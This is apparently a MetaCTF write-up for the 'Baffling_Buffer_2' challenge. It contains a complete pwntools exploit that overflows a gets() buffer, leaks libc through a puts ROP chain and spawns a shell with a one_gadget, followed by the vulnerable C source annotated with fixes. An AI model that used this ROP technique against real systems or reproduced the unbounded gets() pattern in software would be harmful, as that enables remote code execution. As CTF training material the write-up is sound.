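Baffling_Buffer_2
===

###### tags: `MetaCTF`

# implementation

It's a simple ROP chain; you can try one_gadget! :satisfied:

The root cause is the unbounded `gets()` into a 20-byte stack buffer in the source below (a bounded read such as `fgets(source_file, sizeof source_file, stdin)` removes it). The binary has no PIE, so `puts@plt` / `puts@got` and the `pop rdi` gadget have fixed addresses; the first stage leaks the libc address of `puts` and returns to `main`, the second stage reuses the overflow with the leaked base.

# poc - script

lang: python3

```python=
import os
from pwn import *


def change_ld(binary, ld):
    """
    Force to use assigned new ld.so by changing the binary

    Rewrites the PT_INTERP segment of *binary* to *ld* (a bytes path) and
    saves the patched copy as ./Pwn/<name>_debug with mode rwx------, so the
    local run uses the loader that matches the remote libc.
    Returns the patched ELF, or None when a path is unreadable or *ld* does
    not fit in the existing PT_INTERP segment.
    """
    if not os.access(ld, os.R_OK):
        log.failure("Invalid path {} to ld".format(ld))
        return None

    if not isinstance(binary, ELF):
        if not os.access(binary, os.R_OK):
            log.failure("Invalid path {} to binary".format(binary))
            return None
        binary = ELF(binary)

    for segment in binary.segments:
        if segment.header['p_type'] == 'PT_INTERP':
            size = segment.header['p_memsz']
            addr = segment.header['p_paddr']
            data = segment.data()
            # The new path must leave room for its NUL terminator.
            if size <= len(ld):
                log.failure("Failed to change PT_INTERP from {} to {}".format(data, ld))
                return None
            binary.write(addr, ld.ljust(size, b'\0'))
            if not os.access('./Pwn', os.F_OK):
                os.mkdir('./Pwn')
            path = './Pwn/{}_debug'.format(os.path.basename(binary.path))
            if os.access(path, os.F_OK):
                os.remove(path)
                info("Removing exist file {}".format(path))
            binary.save(path)
            os.chmod(path, 0b111000000)  # rwx------
    success("PT_INTERP has changed from {} to {}. Using temp file {}".format(data, ld, path))
    return ELF(path)


elf = change_ld(b'./bb2', b'./ld-2.28.so')
# NOTE: this local process is superseded by the remote() connection below
# and is never closed; drop it (or the remote line) depending on the target.
p = elf.process(env={'LD_PRELOAD': b'./libc-2.28.so'})
#gdb.attach(p)
context.arch = "amd64"
context.log_level = "debug"
e = ELF("./bb2")
#p = process("./bb2")
#libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.31.so")
p = remote("host1.metaproblems.com", "5152")
libc = ELF('./libc-2.28.so')

# Stage 1: overflow source_file, call puts(puts@got) to leak libc, return to main.
p.recvuntil(b"Enter name of file to copy\n")
main = p64(0x401192)
puts_plt = e.plt["puts"].to_bytes(8, byteorder="little")
puts_got = e.got["puts"].to_bytes(8, byteorder="little")
pop_rdi = p64(0x40133b)
ret = pop_rdi + puts_got + puts_plt + main
p.sendline(b"bb2".ljust(8, b"\x00") + b"a" * 48 + ret)
p.recvuntil(b'Enter name of target file\n')
p.sendline(b"/dev/null")
p.recvuntil("File copied successfully.\n")

# kali 31.so
#libc_base = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00"))-485040
#info("libc = " + hex(libc_base))
#libc.address = libc_base

# remote 28.so
# The constant is the offset of puts in the matching libc build.
libc_base = u64(p.recvuntil("\n", drop=True).ljust(8, b"\x00")) - 465168
info("libc = " + hex(libc_base))
libc.address = libc_base

# Stage 2: same overflow, now with libc-relative addresses.
p.recvuntil(b"Enter name of file to copy\n")
# kali 31.so
#p_pop_rsi = p64(0x288df + libc_base)
#p_pop_rdx = p64(0xcb28d + libc_base)
#p_pop_rax = p64(0x3ef58 + libc_base)
#p_syscall = p64(0x2552b + libc_base)
#ret2 = pop_rdi + next(libc.search(b"/bin/sh")).to_bytes(8,byteorder="little") + p_pop_rdx + p64(0) + p_pop_rsi + >

# remote 28.so
#pop_rsi = p64(libc_base + 0x2440e)
#pop_rdx = p64(libc_base + 0x106725)
#pop_rax = p64(libc_base + 0x3a638)
#syscall = p64(libc_base + 0x24104)
#ret2 = pop_rdi + next(libc.search(b"/bin/sh\x00")).to_bytes(8,byteorder="little") + pop_rdx + p64(0) + pop_rsi + p64(0) + pop_rax + p64(59) + syscall

# remote 28.so
one = p64(0x4484f + libc_base)
pop_rax = p64(libc_base + 0x3a638)
ret2 = pop_rax + p64(0) + one
p.sendline(b"bb2".ljust(8, b"\x00") + b"a" * 48 + ret2)
p.recvuntil(b'Enter name of target file\n')
p.sendline(b"/dev/null")
p.interactive()
```

# source

```c=
#include <stdio.h>
#include <stdlib.h>

int main() {
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setbuf(stderr, 0);
    /* BUG: `ch` should be an int. fgetc() returns EOF as an int; stored in a
       char it either never compares equal to EOF (unsigned char) or makes a
       0xFF data byte look like EOF (signed char). */
    char ch, source_file[20], target_file[20];
    FILE *source, *target;
    printf("Enter name of file to copy\n");
    /* BUG: gets() has no length bound, so input longer than the 20-byte
       buffer overwrites the saved frame; this is the overflow the writeup
       uses. Mitigation: fgets(source_file, sizeof source_file, stdin) and
       strip the newline. */
    gets(source_file);
    source = fopen(source_file, "r");
    if( source == NULL ) {
        printf("Press any key to exit...\n");
        exit(EXIT_FAILURE);
    }
    printf("Enter name of target file\n");
    /* Same unbounded read. The target path is also unvalidated, so any file
       the process may write can be overwritten with the source's contents;
       a real program would restrict it to an allowed directory. */
    gets(target_file);
    target = fopen(target_file, "w");
    if( target == NULL ) {
        fclose(source);
        printf("Press any key to exit...\n");
        exit(EXIT_FAILURE);
    }
    while( ( ch = fgetc(source) ) != EOF )
        fputc(ch, target);
    printf("File copied successfully.\n");
    fclose(source);
    fclose(target);
    return 0;
}
```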